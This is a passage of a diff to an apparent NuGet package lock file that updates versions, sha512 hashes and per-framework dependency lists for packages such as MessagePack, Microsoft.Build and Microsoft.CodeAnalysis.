"Microsoft.Extensions.ObjectPool"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.3", "sha512": "sha512-hgu/4KttHz9bXOISmomz1uO4WidkXqBbSu4MjVgj3SeJ/bH4t+nkZ5qybpqpZJHf04hdXlyt/ux0OWv5/xEKRQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "2.5.192", "sha512": "sha512-SnrwSQIKWfxcQvzE1TCUPvJ7A/44KFBDcmCc+YUDIq8QalCf0bGAjiBoAFewhJ81QuS5FsCNCOcKn+IURYlbAQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net48": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.192", "sha512": "sha512-pE/SD2N0+nDAU8BtTHqjyIhLM2L5Mb0NiO4hW0ybiv2I+BbK0JEaGtbKpeEmOvKT+5s2hds0gvk/GrAHhgcpdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.8.3", "sha512": "sha512-jRz++ltVTU9xGAYSnI7fGwLIsg/AwINaxlXaJrcMszO+fyh1xJ8gKZkDz10foT/5y26jZC6G93wyp85NVHc+lA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Security.Principal.Windows", "System.Threading.Tasks.Dataflow", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.8.3", "sha512": "sha512-xDOoj8lpNohM0Sieo4sJ47m/3SAquclF8wFZeAYYuDRHc8hII4XWPhSafFmw5A4TMGOyV08Z1TrrqES9HxMB3Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net462": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net47": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net471": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net6.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net7.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp2.1": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp2.2": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp3.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netcoreapp3.1": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe", "System.Security.Principal.Windows"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.5.0", "sha512": "sha512-La1NFQ7SVz1pVGEUnG15BQG26jJkRMCiitySBXLhuTYf9IG6eZ5j5UFjnM4EFKSVKbictRv+D/F0dQtsCiK9ag==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis", "id": "Microsoft.CodeAnalysis", "version": "4.9.2", "sha512": "sha512-CJh/yj/ZWnDn0qRDovqeb7qhXl4MDFR5CELAQ2B5K9dcEC6JPg7Fkm2ADRiBM4UF7ub+n6fkiE5+/+GPD5WbFg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net462": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net47": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net471": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net472": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net48": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net5.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net6.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net7.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net8.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net9.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netstandard2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "2.5.187", "sha512": "sha512-gZ6QLyipngHr+n/XWWm7TM26j9vkM6+B6RXBuv+ia/DjJsG6pJaQbVuz/+RBFJrSd98eTk+CqHwrE1DtFyR1bw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.187", "sha512": "sha512-1IThHnbMw6Ah9Mb/bZfWEwZDo3ZbsU9usGAOeCs/oPWsklrdxVDNZHjIg6myvjlQvL7oMhagEeb+07kjL410aQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "8.0.0", "sha512": "sha512-ecsHc9lEZZJM7k5HHZA1PV2N+ELEarLFcssV2bn7XQIJoaiNZDkplTNcX+VKANfDGURAuEyVFCcRu7aFy16VUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], 